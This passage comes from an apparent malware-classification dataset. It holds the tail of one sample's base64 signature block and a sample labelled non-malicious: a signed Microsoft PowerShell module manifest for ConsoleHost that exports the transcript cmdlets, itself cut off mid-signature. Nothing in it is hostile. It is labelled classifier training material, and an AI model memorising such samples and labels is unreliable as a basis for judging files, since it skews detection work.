zSHqr9gHgGYQC2hMyX9MGLIpowYCURx3L7kUiGbOiMwaMIIHejCCBWKgAwIBAgIK # YQ6Q0gAAAAAAAzANBgkqhkiG9w0BAQsFADCBiDELMAkGA1UEBhMCVVMxEzARBgNV # BAgTCldhc2hpbmd0b24xEDAOBgNVBAcTB1JlZG1vbmQxHjAcBgNVBAoTFU1pY3Jv # c29mdCBDb3Jwb3JhdGlvbjEyMDAGA1UEAxMpTWljcm9zb2Z0IFJvb3QgQ2VydGlm # aWNhdGUgQXV0aG9yaXR5IDIwMTEwHhcNMTEwNzA4MjA1OTA5WhcNMjYwNzA4MjEw # OTA5WjB+MQswCQYDVQQGEwJVUzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UE # BxMHUmVkbW9uZDEeMBwGA1UEChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMSgwJgYD # VQQDEx9NaWNyb3NvZnQgQ29kZSBTaWduaW5nIFBDQSAyMDExMIICIjANBgkqhkiG # 9w0BAQEFAAOCAg8AMIICCgKCAgEAq/D6chAcLq3YbqqCEE00uvK2WCGfQhsqa+la # UKq4BjgaBEm6f8MMHt03a8YS2AvwOMKZBrDIOdUBFDFC04kNeWSHfpRgJGyvnkmc # 6Whe0t+bU7IKLMOv2akrrnoJr9eWWcpgGgXpZnboMlImEi/nqwhQz7NEt13YxC4D # dato88tt8zpcoRb0RrrgOGSsbmQ1eKagYw8t00CT+OPeBw3VXHmlSSnnDb6gE3e+ # lD3v++MrWhAfTVYoonpy4BI6t0le2O3tQ5GD2Xuye4Yb2T6xjF3oiU+EGvKhL1nk # kDstrjNYxbc+/jLTswM9sbKvkjh+0p2ALPVOVpEhNSXDOW5kf1O6nA+tGSOEy/S6 # A4aN91/w0FK/jJSHvMAhdCVfGCi2zCcoOCWYOUo2z3yxkq4cI6epZuxhH2rhKEmd # X4jiJV3TIUs+UsS1Vz8kA/DRelsv1SPjcF0PUUZ3s/gA4bysAoJf28AVs70b1FVL # 5zmhD+kjSbwYuER8ReTBw3J64HLnJN+/RpnF78IcV9uDjexNSTCnq47f7Fufr/zd # sGbiwZeBe+3W7UvnSSmnEyimp31ngOaKYnhfsi+E11ecXL93KCjx7W3DKI8sj0A3 # T8HhhUSJxAlMxdSlQy90lfdu+HggWCwTXWCVmj5PM4TasIgX3p5O9JawvEagbJjS # 4NaIjAsCAwEAAaOCAe0wggHpMBAGCSsGAQQBgjcVAQQDAgEAMB0GA1UdDgQWBBRI # bmTlUAXTgqoXNzcitW2oynUClTAZBgkrBgEEAYI3FAIEDB4KAFMAdQBiAEMAQTAL # BgNVHQ8EBAMCAYYwDwYDVR0TAQH/BAUwAwEB/zAfBgNVHSMEGDAWgBRyLToCMZBD # uRQFTuHqp8cx0SOJNDBaBgNVHR8EUzBRME+gTaBLhklodHRwOi8vY3JsLm1pY3Jv # c29mdC5jb20vcGtpL2NybC9wcm9kdWN0cy9NaWNSb29DZXJBdXQyMDExXzIwMTFf # MDNfMjIuY3JsMF4GCCsGAQUFBwEBBFIwUDBOBggrBgEFBQcwAoZCaHR0cDovL3d3 # dy5taWNyb3NvZnQuY29tL3BraS9jZXJ0cy9NaWNSb29DZXJBdXQyMDExXzIwMTFf # MDNfMjIuY3J0MIGfBgNVHSAEgZcwgZQwgZEGCSsGAQQBgjcuAzCBgzA/BggrBgEF # BQcCARYzaHR0cDovL3d3dy5taWNyb3NvZnQuY29tL3BraW9wcy9kb2NzL3ByaW1h # cnljcHMuaHRtMEAGCCsGAQUFBwICMDQeMiAdAEwAZQBnAGEAbABfAHAAbwBsAGkA # YwB5AF8AcwB0AGEAdABlAG0AZQBuAHQALiAdMA0GCSqGSIb3DQEBCwUAA4ICAQBn # 8oalmOBUeRou09h0ZyKbC5YR4WOSmUKWfdJ5DJDBZV8uLD74w3LRbYP+vj/oCso7 # v0epo/Np22O/IjWll11lhJB9i0ZQVdgMknzSGksc8zxCi1LQsP1r4z4HLimb5j0b # pdS1HXeUOeLpZMlEPXh6I/MTfaaQdION9MsmAkYqwooQu6SpBQyb7Wj6aC6VoCo/ # KmtYSWMfCWluWpiW5IP0wI/zRive/DvQvTXvbiWu5a8n7dDd8w6vmSiXmE0OPQvy # CInWH8MyGOLwxS3OW560STkKxgrCxq2u5bLZ2xWIUUVYODJxJxp/sfQn+N4sOiBp # mLJZiWhub6e3dMNABQamASooPoI/E01mC8CzTfXhj38cbxV9Rad25UAqZaPDXVJi # hsMdYzaXht/a8/jyFqGaJ+HNpZfQ7l1jQeNbB5yHPgZ3BtEGsXUfFL5hYbXw3MYb # BL7fQccOKO7eZS/sl/ahXJbYANahRr1Z85elCUtIEJmAH9AAKcWxm6U/RXceNcbS # oqKfenoi+kiVH6v7RyOA9Z74v2u3S5fi63V4GuzqN5l5GEv/1rMjaHXmr/r8i+sL # gOppO6/8MO0ETI7f33VtY5E90Z1WTk+/gFcioXgRMiF670EKsT/7qMykXcGhiJtX # cVZOSEXAQsmbdlsKgEhr/Xmfwb1tbWrJUnMTDXpQzTGCGaEwghmdAgEBMIGVMH4x # CzAJBgNVBAYTAlVTMRMwEQYDVQQIEwpXYXNoaW5ndG9uMRAwDgYDVQQHEwdSZWRt # b25kMR4wHAYDVQQKExVNaWNyb3NvZnQgQ29ycG9yYXRpb24xKDAmBgNVBAMTH01p # Y3Jvc29mdCBDb2RlIFNpZ25pbmcgUENBIDIwMTECEzMAAAOuLTVRyFOPVR0AAAAA # A64wDQYJYIZIAWUDBAIBBQCgga4wGQYJKoZIhvcNAQkDMQwGCisGAQQBgjcCAQQw # HAYKKwYBBAGCNwIBCzEOMAwGCisGAQQBgjcCARUwLwYJKoZIhvcNAQkEMSIEICth # PnqYURhBBUDsAK31uAPNoa0nwFcdKUHczAToixdkMEIGCisGAQQBgjcCAQwxNDAy # oBSAEgBNAGkAYwByAG8AcwBvAGYAdKEagBhodHRwOi8vd3d3Lm1pY3Jvc29mdC5j # b20wDQYJKoZIhvcNAQEBBQAEggEAsf7plc0oxonXiK+0JCwJrGdVTeH0pmQ53WcF # HoG3fOleXOSMHTMZDerWuuX7zUwHqgaSMo1dRtWUibO7ThwlXM2l2JOlgvqFuxFe # QslrpRpZH8/0SJS1RSxj/n2LKkAoLg6Y2MucON3JP6HLRv23GQZY93kc+LmZ5uQj # VWV9QXWNy9by3H7LNBtU37JNZvPP5Y4NldazFLVjrYvJK/4pBZxvGDXXk1DZyshf # TFTV+JKemZYvN+W0oSvqc56QP9g0H6/uSaCvj6mAvQeYW6fD8aTdXThwGs2olHpK # aznylvOlyqGRlE/3yrVfGtBG2IdvkNwilbPrrnt8y2KsDuuyu6GCFyswghcnBgor # BgEEAYI3AwMBMYIXFzCCFxMGCSqGSIb3DQEHAqCCFwQwghcAAgEDMQ8wDQYJYIZI # AWUDBAIBBQAwggFZBgsqhkiG9w0BCRABBKCCAUgEggFEMIIBQAIBAQYKKwYBBAGE # WQoDATAxMA0GCWCGSAFlAwQCAQUABCCDa1KeZtDPC+8i3axcQaiZL5tfUPgOlsdf # OqQv5lBYsgIGZnLE6925GBMyMDI0MDcwNDA4MzA1My44NzFaMASAAgH0oIHYpIHV # MIHSMQswCQYDVQQGEwJVUzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UEBxMH # UmVkbW9uZDEeMBwGA1UEChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMS0wKwYDVQQL # EyRNaWNyb3NvZnQgSXJlbGFuZCBPcGVyYXRpb25zIExpbWl0ZWQxJjAkBgNVBAsT # HVRoYWxlcyBUU1MgRVNOOjA4NDItNEJFNi1DMjlBMSUwIwYDVQQDExxNaWNyb3Nv # ZnQgVGltZS1TdGFtcCBTZXJ2aWNloIIRejCCBycwggUPoAMCAQICEzMAAAHajtXJ # WgDREbEAAQAAAdowDQYJKoZIhvcNAQELBQAwfDELMAkGA1UEBhMCVVMxEzARBgNV # BAgTCldhc2hpbmd0b24xEDAOBgNVBAcTB1JlZG1vbmQxHjAcBgNVBAoTFU1pY3Jv # c29mdCBDb3Jwb3JhdGlvbjEmMCQGA1UEAxMdTWljcm9zb2Z0IFRpbWUtU3RhbXAg # UENBIDIwMTAwHhcNMjMxMDEyMTkwNjU5WhcNMjUwMTEwMTkwNjU5WjCB0jELMAkG # A1UEBhMCVVMxEzARBgNVBAgTCldhc2hpbmd0b24xEDAOBgNVBAcTB1JlZG1vbmQx # HjAcBgNVBAoTFU1pY3Jvc29mdCBDb3Jwb3JhdGlvbjEtMCsGA1UECxMkTWljcm9z # b2Z0IElyZWxhbmQgT3BlcmF0aW9ucyBMaW1pdGVkMSYwJAYDVQQLEx1UaGFsZXMg # VFNTIEVTTjowODQyLTRCRTYtQzI5QTElMCMGA1UEAxMcTWljcm9zb2Z0IFRpbWUt # U3RhbXAgU2VydmljZTCCAiIwDQYJKoZIhvcNAQEBBQADggIPADCCAgoCggIBAJOQ # Bgh2tVFR1j8jQA4NDf8bcVrXSN080CNKPSQo7S57sCnPU0FKF47w2L6qHtwm4EnC # lF2cruXFp/l7PpMQg25E7X8xDmvxr8BBE6iASAPCfrTebuvAsZWcJYhy7prgCuBf # 7OidXpgsW1y8p6Vs7sD2aup/0uveYxeXlKtsPjMCplHkk0ba+HgLho0J68Kdji3D # M2K59wHy9xrtsYK+X9erbDGZ2mmX3765aS5Q7/ugDxMVgzyj80yJn6ULnknD9i4k # UQxVhqV1dc/DF6UBeuzfukkMed7trzUEZMRyla7qhvwUeQlgzCQhpZjz+zsQgpXl # PczvGd0iqr7lACwfVGog5plIzdExvt1TA8Jmef819aTKwH1IVEIwYLA6uvS8kRdA # 6RxvMcb//ulNjIuGceyykMAXEynVrLG9VvK4rfrCsGL3j30Lmidug+owrcCjQagY # mrGk1hBykXilo9YB8Qyy5Q1KhGuH65V3zFy8a0kwbKBRs8VR4HtoPYw9z1DdcJfZ # BO2dhzX3yAMipCGm6SmvmvavRsXhy805jiApDyN+s0/b7os2z8iRWGJk6M9uuT24 # 93gFV/9JLGg5YJJCJXI+yxkO/OXnZJsuGt0+zWLdHS4XIXBG17oPu5KsFfRTHREl # oR2dI6GwaaxIyDySHYOtvIydla7u4lfnfCjY/qKTAgMBAAGjggFJMIIBRTAdBgNV # HQ4EFgQUoXyNyVE9ZhOVizEUVwhNgL8PX0UwHwYDVR0jBBgwFoAUn6cVXQBeYl2D # 9OXSZacbUzUZ6XIwXwYDVR0fBFgwVjBUoFKgUIZOaHR0cDovL3d3dy5taWNyb3Nv # ZnQuY29tL3BraW9wcy9jcmwvTWljcm9zb2Z0JTIwVGltZS1TdGFtcCUyMFBDQSUy # MDIwMTAoMSkuY3JsMGwGCCsGAQUFBwEBBGAwXjBcBggrBgEFBQcwAoZQaHR0cDov # L3d3dy5taWNyb3NvZnQuY29tL3BraW9wcy9jZXJ0cy9NaWNyb3NvZnQlMjBUaW1l # LVN0YW1wJTIwUENBJTIwMjAxMCgxKS5jcnQwDAYDVR0TAQH/BAIwADAWBgNVHSUB # Af8EDDAKBggrBgEFBQcDCDAOBgNVHQ8BAf8EBAMCB4AwDQYJKoZIhvcNAQELBQAD # ggIBALmDVdTtuI0jAEt41O2OM8CU237TGMyhrGr7FzKCEFaXxtoqk/IObQriq1ca # HVh2vyuQ24nz3TdOBv7rcs/qnPjOxnXFLyZPeaWLsNuARVmUViyVYXjXYB5DwzaW # ZgScY8GKL7yGjyWrh78WJUgh7rE1+5VD5h0/6rs9dBRqAzI9fhZz7spsjt8vnx50 # WExbBSSH7rfabHendpeqbTmW/RfcaT+GFIsT+g2ej7wRKIq/QhnsoF8mpFNPHV1q # /WK/rF/ChovkhJMDvlqtETWi97GolOSKamZC9bYgcPKfz28ed25WJy10VtQ9P5+C # /2dOfDaz1RmeOb27Kbegha0SfPcriTfORVvqPDSa3n9N7dhTY7+49I8evoad9hdZ # 8CfIOPftwt3xTX2RhMZJCVoFlabHcvfb84raFM6cz5EYk+x1aVEiXtgK6R0xn1wj # MXHf0AWlSjqRkzvSnRKzFsZwEl74VahlKVhI+Ci9RT9+6Gc0xWzJ7zQIUFE3Jiix # 5+7KL8ArHfBY9UFLz4snboJ7Qip3IADbkU4ZL0iQ8j8Ixra7aSYfToUefmct3dM6 # 9ff4Eeh2Kh9NsKiiph589Ap/xS1jESlrfjL/g/ZboaS5d9a2fA598mubDvLD5x5P # P37700vm/Y+PIhmp2fTvuS2sndeZBmyTqcUNHRNmCk+njV3nMIIHcTCCBVmgAwIB # AgITMwAAABXF52ueAptJmQAAAAAAFTANBgkqhkiG9w0BAQsFADCBiDELMAkGA1UE # BhMCVVMxEzARBgNVBAgTCldhc2hpbmd0b24xEDAOBgNVBAcTB1JlZG1vbmQxHjAc # BgNVBAoTFU1pY3Jvc29mdCBDb3Jwb3JhdGlvbjEyMDAGA1UEAxMpTWljcm9zb2Z0 # IFJvb3QgQ2VydGlmaWNhdGUgQXV0aG9yaXR5IDIwMTAwHhcNMjEwOTMwMTgyMjI1 # WhcNMzAwOTMwMTgzMjI1WjB8MQswCQYDVQQGEwJVUzETMBEGA1UECBMKV2FzaGlu # Z3RvbjEQMA4GA1UEBxMHUmVkbW9uZDEeMBwGA1UEChMVTWljcm9zb2Z0IENvcnBv # cmF0aW9uMSYwJAYDVQQDEx1NaWNyb3NvZnQgVGltZS1TdGFtcCBQQ0EgMjAxMDCC # AiIwDQYJKoZIhvcNAQEBBQADggIPADCCAgoCggIBAOThpkzntHIhC3miy9ckeb0O # 1YLT/e6cBwfSqWxOdcjKNVf2AX9sSuDivbk+F2Az/1xPx2b3lVNxWuJ+Slr+uDZn # hUYjDLWNE893MsAQGOhgfWpSg0S3po5GawcU88V29YZQ3MFEyHFcUTE3oAo4bo3t # 1w/YJlN8OWECesSq/XJprx2rrPY2vjUmZNqYO7oaezOtgFt+jBAcnVL+tuhiJdxq # D89d9P6OU8/W7IVWTe/dvI2k45GPsjksUZzpcGkNyjYtcI4xyDUoveO0hyTD4MmP # frVUj9z6BVWYbWg7mka97aSueik3rMvrg0XnRm7KMtXAhjBcTyziYrLNueKNiOSW # rAFKu75xqRdbZ2De+JKRHh09/SDPc31BmkZ1zcRfNN0Sidb9pSB9fvzZnkXftnIv # 231fgLrbqn427DZM9ituqBJR6L8FA6PRc6ZNN3SUHDSCD/AQ8rdHGO2n6Jl8P0zb # r17C89XYcz1DTsEzOUyOArxCaC4Q6oRRRuLRvWoYWmEBc8pnol7XKHYC4jMYcten # IPDC+hIK12NvDMk2ZItboKaDIV1fMHSRlJTYuVD5C4lh8zYGNRiER9vcG9H9stQc # xWv2XFJRXRLbJbqvUAV6bMURHXLvjflSxIUXk8A8FdsaN8cIFRg/eKtFtvUeh17a # j54WcmnGrnu3tz5q4i6tAgMBAAGjggHdMIIB2TASBgkrBgEEAYI3FQEEBQIDAQAB # MCMGCSsGAQQBgjcVAgQWBBQqp1L+ZMSavoKRPEY1Kc8Q/y8E7jAdBgNVHQ4EFgQU # n6cVXQBeYl2D9OXSZacbUzUZ6XIwXAYDVR0gBFUwUzBRBgwrBgEEAYI3TIN9AQEw # QTA/BggrBgEFBQcCARYzaHR0cDovL3d3dy5taWNyb3NvZnQuY29tL3BraW9wcy9E # b2NzL1JlcG9zaXRvcnkuaHRtMBMGA1UdJQQMMAoGCCsGAQUFBwMIMBkGCSsGAQQB # gjcUAgQMHgoAUwB1AGIAQwBBMAsGA1UdDwQEAwIBhjAPBgNVHRMBAf8EBTADAQH/ # MB8GA1UdIwQYMBaAFNX2VsuP6KJcYmjRPZSQW9fOmhjEMFYGA1UdHwRPME0wS6BJ # oEeGRWh0dHA6Ly9jcmwubWljcm9zb2Z0LmNvbS9wa2kvY3JsL3Byb2R1Y3RzL01p # Y1Jvb0NlckF1dF8yMDEwLTA2LTIzLmNybDBaBggrBgEFBQcBAQROMEwwSgYIKwYB # BQUHMAKGPmh0dHA6Ly93d3cubWljcm9zb2Z0LmNvbS9wa2kvY2VydHMvTWljUm9v # Q2VyQXV0XzIwMTAtMDYtMjMuY3J0MA0GCSqGSIb3DQEBCwUAA4ICAQCdVX38Kq3h # LB9nATEkW+Geckv8qW/qXBS2Pk5HZHixBpOXPTEztTnXwnE2P9pkbHzQdTltuw8x # 5MKP+2zRoZQYIu7pZmc6U03dmLq2HnjYNi6cqYJWAAOwBb6J6Gngugnue99qb74p # y27YP0h1AdkY3m2CDPVtI1TkeFN1JFe53Z/zjj3G82jfZfakVqr3lbYoVSfQJL1A # oL8ZthISEV09J+BAljis9/kpicO8F7BUhUKz/AyeixmJ5/ALaoHCgRlCGVJ1ijbC # HcNhcy4sa3tuPywJeBTpkbKpW99Jo3QMvOyRgNI95ko+ZjtPu4b6MhrZlvSP9pEB # 9s7GdP32THJvEKt1MMU0sHrYUP4KWN1APMdUbZ1jdEgssU5HLcEUBHG/ZPkkvnNt # yo4JvbMBV0lUZNlz138eW0QBjloZkWsNn6Qo3GcZKCS6OEuabvshVGtqRRFHqfG3 # rsjoiV5PndLQTHa1V1QJsWkBRH58oWFsc/4Ku+xBZj1p/cvBQUl+fpO+y/g75LcV # v7TOPqUxUYS8vwLBgqJ7Fx0ViY1w/ue10CgaiQuPNtq6TPmb/wrpNPgkNWcr4A24 # 5oyZ1uEi6vAnQj0llOZ0dFtq0Z4+7X6gMTN9vMvpe784cETRkPHIqzqKOghif9lw # Y1NNje6CbaUFEMFxBmoQtB1VM1izoXBm8qGCAtYwggI/AgEBMIIBAKGB2KSB1TCB # 0jELMAkGA1UEBhMCVVMxEzARBgNVBAgTCldhc2hpbmd0b24xEDAOBgNVBAcTB1Jl # ZG1vbmQxHjAcBgNVBAoTFU1pY3Jvc29mdCBDb3Jwb3JhdGlvbjEtMCsGA1UECxMk # TWljcm9zb2Z0IElyZWxhbmQgT3BlcmF0aW9ucyBMaW1pdGVkMSYwJAYDVQQLEx1U # aGFsZXMgVFNTIEVTTjowODQyLTRCRTYtQzI5QTElMCMGA1UEAxMcTWljcm9zb2Z0 # IFRpbWUtU3RhbXAgU2VydmljZaIjCgEBMAcGBSsOAwIaAxUAQqIfIYljHUbNoY0/ # wjhXRn/sSA2ggYMwgYCkfjB8MQswCQYDVQQGEwJVUzETMBEGA1UECBMKV2FzaGlu # Z3RvbjEQMA4GA1UEBxMHUmVkbW9uZDEeMBwGA1UEChMVTWljcm9zb2Z0IENvcnBv # cmF0aW9uMSYwJAYDVQQDEx1NaWNyb3NvZnQgVGltZS1TdGFtcCBQQ0EgMjAxMDAN # BgkqhkiG9w0BAQUFAAIFAOowX6QwIhgPMjAyNDA3MDQwNzM5MTZaGA8yMDI0MDcw # NTA3MzkxNlowdjA8BgorBgEEAYRZCgQBMS4wLDAKAgUA6jBfpAIBADAJAgEAAgFU # AgH/MAcCAQACAhIOMAoCBQDqMbEkAgEAMDYGCisGAQQBhFkKBAIxKDAmMAwGCisG # AQQBhFkKAwKgCjAIAgEAAgMHoSChCjAIAgEAAgMBhqAwDQYJKoZIhvcNAQEFBQAD # gYEAmbMBf2cUyN5DNyGeito6+io2Q98WjiPUCIcBhzwM8BGmXQFxK/l5s9jhExEJ # kUK67AVnpMPUtZc8jAQvf4q24Ka6h0N1UCdgv19tIj/6rdBFiPVdd1B/Pm12CqH5 # ltr6f633B2BGBDRIlueF+M2MGx034R53v9f0hKlO4bKjEGExggQNMIIECQIBATCB # kzB8MQswCQYDVQQGEwJVUzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UEBxMH # UmVkbW9uZDEeMBwGA1UEChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMSYwJAYDVQQD # Ex1NaWNyb3NvZnQgVGltZS1TdGFtcCBQQ0EgMjAxMAITMwAAAdqO1claANERsQAB # AAAB2jANBglghkgBZQMEAgEFAKCCAUowGgYJKoZIhvcNAQkDMQ0GCyqGSIb3DQEJ # EAEEMC8GCSqGSIb3DQEJBDEiBCAmyB+xDj1010XBxYF9EmKaTtzQ5hr49ycwn5BU # 72dRdTCB+gYLKoZIhvcNAQkQAi8xgeowgecwgeQwgb0EICKlo2liwO+epN73kOPU # LT3TbQjmWOJutb+d0gI7GD3GMIGYMIGApH4wfDELMAkGA1UEBhMCVVMxEzARBgNV # BAgTCldhc2hpbmd0b24xEDAOBgNVBAcTB1JlZG1vbmQxHjAcBgNVBAoTFU1pY3Jv # c29mdCBDb3Jwb3JhdGlvbjEmMCQGA1UEAxMdTWljcm9zb2Z0IFRpbWUtU3RhbXAg # UENBIDIwMTACEzMAAAHajtXJWgDREbEAAQAAAdowIgQgf3dpjAs+mzqOx/xfSYoV # vKK6bX1fIFVJvHN8TUS1n9swDQYJKoZIhvcNAQELBQAEggIASbY0e3B6xVIXBb0w # RFCCDaEjeLoIE3+BxEtULCSM5jYnaBcQ/t77yLJ/DRuXsdD+YIQ7jN6uJh8HN/cp # ba8Ynu0ZdaD8B1p+yFIfrkIYryyrwnme3AFZUlvm2+VS/kCILcEG2MCh/ZHmjVSy # EC4s7yUK5gABZQ3do2CWshJzBM2b3eAQYGv0UhrebhIg4iWt/BF9jfoT2g5CjBYq # ioeTRpyPDEPk/ikkF24ZVGHBftfgh9eB+QkjqmVJns4BuYIt4QzKYO16QEjJcv3K # iDrg1IkzPDCfROyPohysd29gbi/4a8m5izcpfvWTVvdwoD3wFvNnt7pxhmg4rMp6 # 4rKwzlyjE/76K/J1/JT5sq9ihTfiX0nb46I7OXzZ48KYhR+mJ1G+L42qi0TsuH7b # wKYou10U6Z9GQ7i1OKTF23OlyGA6uzLs9fGBWlBxEgj6dGFP6Zqi1dYXc4oRJzTL # E2mUurbEqI+pORRH+dsMjle1ydCu/nceNSii2xtLPlk8JDH4CtkwJs3V+2rB7pai # n/LG76yQksGdxSGl5LR14rxr83b6kcSVue9FWNcOxJCiG0vb0acGQSClZN2F5x4i # BN2ckNXgU08BwxHqtVnT3on6+1i1jswfXUBe35cIFoQn08Z/wjgouKHjENY60Akc # 2kDyXdYl8hxVN9GpHOhKDMKMI/o= # SIG # End signature block
combined_dataset/train/non-malicious/sample_10_19.ps1
sample_10_19.ps1
@{ GUID="56D66100-99A0-4FFC-A12D-EEE9A6718AEF" Author="PowerShell" CompanyName="Microsoft Corporation" Copyright="Copyright (c) Microsoft Corporation." ModuleVersion="7.0.0.0" CompatiblePSEditions = @("Core") PowerShellVersion="3.0" FunctionsToExport = @() CmdletsToExport="Start-Transcript", "Stop-Transcript" AliasesToExport = @() NestedModules="Microsoft.PowerShell.ConsoleHost.dll" HelpInfoURI = 'https://aka.ms/powershell73-help' } # SIG # Begin signature block # MIIoLQYJKoZIhvcNAQcCoIIoHjCCKBoCAQExDzANBglghkgBZQMEAgEFADB5Bgor # BgEEAYI3AgEEoGswaTA0BgorBgEEAYI3AgEeMCYCAwEAAAQQH8w7YFlLCE63JNLG # KX7zUQIBAAIBAAIBAAIBAAIBADAxMA0GCWCGSAFlAwQCAQUABCAafI9Gy/Jba/h5 # P4E+2b0zPlBjhQyHNjAYnPqkeCyjq6CCDXYwggX0MIID3KADAgECAhMzAAAEBGx0 # Bv9XKydyAAAAAAQEMA0GCSqGSIb3DQEBCwUAMH4xCzAJBgNVBAYTAlVTMRMwEQYD # VQQIEwpXYXNoaW5ndG9uMRAwDgYDVQQHEwdSZWRtb25kMR4wHAYDVQQKExVNaWNy # b3NvZnQgQ29ycG9yYXRpb24xKDAmBgNVBAMTH01pY3Jvc29mdCBDb2RlIFNpZ25p # bmcgUENBIDIwMTEwHhcNMjQwOTEyMjAxMTE0WhcNMjUwOTExMjAxMTE0WjB0MQsw # CQYDVQQGEwJVUzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UEBxMHUmVkbW9u # ZDEeMBwGA1UEChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMR4wHAYDVQQDExVNaWNy # b3NvZnQgQ29ycG9yYXRpb24wggEiMA0GCSqGSIb3DQEBAQUAA4IBDwAwggEKAoIB # AQC0KDfaY50MDqsEGdlIzDHBd6CqIMRQWW9Af1LHDDTuFjfDsvna0nEuDSYJmNyz # NB10jpbg0lhvkT1AzfX2TLITSXwS8D+mBzGCWMM/wTpciWBV/pbjSazbzoKvRrNo # DV/u9omOM2Eawyo5JJJdNkM2d8qzkQ0bRuRd4HarmGunSouyb9NY7egWN5E5lUc3 # a2AROzAdHdYpObpCOdeAY2P5XqtJkk79aROpzw16wCjdSn8qMzCBzR7rvH2WVkvF # HLIxZQET1yhPb6lRmpgBQNnzidHV2Ocxjc8wNiIDzgbDkmlx54QPfw7RwQi8p1fy # 4byhBrTjv568x8NGv3gwb0RbAgMBAAGjggFzMIIBbzAfBgNVHSUEGDAWBgorBgEE # AYI3TAgBBggrBgEFBQcDAzAdBgNVHQ4EFgQU8huhNbETDU+ZWllL4DNMPCijEU4w # RQYDVR0RBD4wPKQ6MDgxHjAcBgNVBAsTFU1pY3Jvc29mdCBDb3Jwb3JhdGlvbjEW # MBQGA1UEBRMNMjMwMDEyKzUwMjkyMzAfBgNVHSMEGDAWgBRIbmTlUAXTgqoXNzci # tW2oynUClTBUBgNVHR8ETTBLMEmgR6BFhkNodHRwOi8vd3d3Lm1pY3Jvc29mdC5j # b20vcGtpb3BzL2NybC9NaWNDb2RTaWdQQ0EyMDExXzIwMTEtMDctMDguY3JsMGEG # CCsGAQUFBwEBBFUwUzBRBggrBgEFBQcwAoZFaHR0cDovL3d3dy5taWNyb3NvZnQu # Y29tL3BraW9wcy9jZXJ0cy9NaWNDb2RTaWdQQ0EyMDExXzIwMTEtMDctMDguY3J0 # MAwGA1UdEwEB/wQCMAAwDQYJKoZIhvcNAQELBQADggIBAIjmD9IpQVvfB1QehvpC # Ge7QeTQkKQ7j3bmDMjwSqFL4ri6ae9IFTdpywn5smmtSIyKYDn3/nHtaEn0X1NBj # L5oP0BjAy1sqxD+uy35B+V8wv5GrxhMDJP8l2QjLtH/UglSTIhLqyt8bUAqVfyfp # h4COMRvwwjTvChtCnUXXACuCXYHWalOoc0OU2oGN+mPJIJJxaNQc1sjBsMbGIWv3 # cmgSHkCEmrMv7yaidpePt6V+yPMik+eXw3IfZ5eNOiNgL1rZzgSJfTnvUqiaEQ0X # dG1HbkDv9fv6CTq6m4Ty3IzLiwGSXYxRIXTxT4TYs5VxHy2uFjFXWVSL0J2ARTYL # E4Oyl1wXDF1PX4bxg1yDMfKPHcE1Ijic5lx1KdK1SkaEJdto4hd++05J9Bf9TAmi # u6EK6C9Oe5vRadroJCK26uCUI4zIjL/qG7mswW+qT0CW0gnR9JHkXCWNbo8ccMk1 # sJatmRoSAifbgzaYbUz8+lv+IXy5GFuAmLnNbGjacB3IMGpa+lbFgih57/fIhamq # 5VhxgaEmn/UjWyr+cPiAFWuTVIpfsOjbEAww75wURNM1Imp9NJKye1O24EspEHmb # DmqCUcq7NqkOKIG4PVm3hDDED/WQpzJDkvu4FrIbvyTGVU01vKsg4UfcdiZ0fQ+/ # V0hf8yrtq9CkB8iIuk5bBxuPMIIHejCCBWKgAwIBAgIKYQ6Q0gAAAAAAAzANBgkq # hkiG9w0BAQsFADCBiDELMAkGA1UEBhMCVVMxEzARBgNVBAgTCldhc2hpbmd0b24x # EDAOBgNVBAcTB1JlZG1vbmQxHjAcBgNVBAoTFU1pY3Jvc29mdCBDb3Jwb3JhdGlv # bjEyMDAGA1UEAxMpTWljcm9zb2Z0IFJvb3QgQ2VydGlmaWNhdGUgQXV0aG9yaXR5 # IDIwMTEwHhcNMTEwNzA4MjA1OTA5WhcNMjYwNzA4MjEwOTA5WjB+MQswCQYDVQQG # EwJVUzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UEBxMHUmVkbW9uZDEeMBwG # A1UEChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMSgwJgYDVQQDEx9NaWNyb3NvZnQg # Q29kZSBTaWduaW5nIFBDQSAyMDExMIICIjANBgkqhkiG9w0BAQEFAAOCAg8AMIIC # CgKCAgEAq/D6chAcLq3YbqqCEE00uvK2WCGfQhsqa+laUKq4BjgaBEm6f8MMHt03 # a8YS2AvwOMKZBrDIOdUBFDFC04kNeWSHfpRgJGyvnkmc6Whe0t+bU7IKLMOv2akr # rnoJr9eWWcpgGgXpZnboMlImEi/nqwhQz7NEt13YxC4Ddato88tt8zpcoRb0Rrrg # OGSsbmQ1eKagYw8t00CT+OPeBw3VXHmlSSnnDb6gE3e+lD3v++MrWhAfTVYoonpy # 4BI6t0le2O3tQ5GD2Xuye4Yb2T6xjF3oiU+EGvKhL1nkkDstrjNYxbc+/jLTswM9 # sbKvkjh+0p2ALPVOVpEhNSXDOW5kf1O6nA+tGSOEy/S6A4aN91/w0FK/jJSHvMAh # dCVfGCi2zCcoOCWYOUo2z3yxkq4cI6epZuxhH2rhKEmdX4jiJV3TIUs+UsS1Vz8k # A/DRelsv1SPjcF0PUUZ3s/gA4bysAoJf28AVs70b1FVL5zmhD+kjSbwYuER8ReTB # w3J64HLnJN+/RpnF78IcV9uDjexNSTCnq47f7Fufr/zdsGbiwZeBe+3W7UvnSSmn # Eyimp31ngOaKYnhfsi+E11ecXL93KCjx7W3DKI8sj0A3T8HhhUSJxAlMxdSlQy90 # lfdu+HggWCwTXWCVmj5PM4TasIgX3p5O9JawvEagbJjS4NaIjAsCAwEAAaOCAe0w # ggHpMBAGCSsGAQQBgjcVAQQDAgEAMB0GA1UdDgQWBBRIbmTlUAXTgqoXNzcitW2o # ynUClTAZBgkrBgEEAYI3FAIEDB4KAFMAdQBiAEMAQTALBgNVHQ8EBAMCAYYwDwYD # VR0TAQH/BAUwAwEB/zAfBgNVHSMEGDAWgBRyLToCMZBDuRQFTuHqp8cx0SOJNDBa # 